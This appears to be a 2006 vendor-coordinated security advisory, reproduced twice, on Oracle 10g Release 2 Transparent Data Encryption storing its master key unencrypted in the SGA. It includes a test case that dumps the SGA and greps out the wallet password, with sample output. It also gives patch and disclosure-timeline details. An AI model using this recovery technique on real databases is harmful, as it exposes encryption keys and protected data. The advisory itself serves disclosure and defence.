ak@red-database-security.com
18/01/06, 21:00
Transparent Data Encryption stores key unencrypted in the SGA
Name Transparent Data Encryption stores key unencrypted in the SGA
Affected Oracle Database 10g Release 2
Severity High Risk
Category Information disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 17 January 2005 (V 1.00)
Oracle Bug 5802173
Time to fix 190 days
Details:
########
The Oracle security feature "Transparent Data Encryption" is storing the masterkey unencrypted in the SGA. A skilled attacker or non-security DBA can retrieve the plaintext masterkey.
Test case:
##########
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";
System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 Production With the Partitioning, OLAP and Data Mining options
[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin
[oracle@ora10201 /]$ cd /tmp
[oracle@ora10201 /]$ dumpsga
[oracle@ora10201 /]$ strings * | grep -iH secretpassword
secretpassword
secretpassword
secretpassword
[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-
^@^@0êd$L4^L¿^Xp /¹]/º<8f>^Dsecretpassword^@^M^U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[]
Patch Information:
##################
Oracle fixed this issue with the patches from the critical patch update january 2006 for Oracle 10g Release 2.
History:
########
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006
(CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory
© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html
Name Transparent Data Encryption stores key unencrypted in the SGA
Affected Oracle Database 10g Release 2
Severity High Risk
Category Information disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 17 January 2005 (V 1.00)
Oracle Bug 5802173
Time to fix 190 days
Details:
########
The Oracle security feature "Transparent Data Encryption" is storing the masterkey unencrypted in the SGA. A skilled attacker or non-security DBA can retrieve the plaintext masterkey.
Test case:
##########
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";
System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 Production With the Partitioning, OLAP and Data Mining options
[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin
[oracle@ora10201 /]$ cd /tmp
[oracle@ora10201 /]$ dumpsga
[oracle@ora10201 /]$ strings * | grep -iH secretpassword
secretpassword
secretpassword
secretpassword
[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-
^@^@0êd$L4^L¿^Xp /¹]/º<8f>^Dsecretpassword^@^M^U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[]
Patch Information:
##################
Oracle fixed this issue with the patches from the critical patch update january 2006 for Oracle 10g Release 2.
History:
########
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006
(CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory
© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html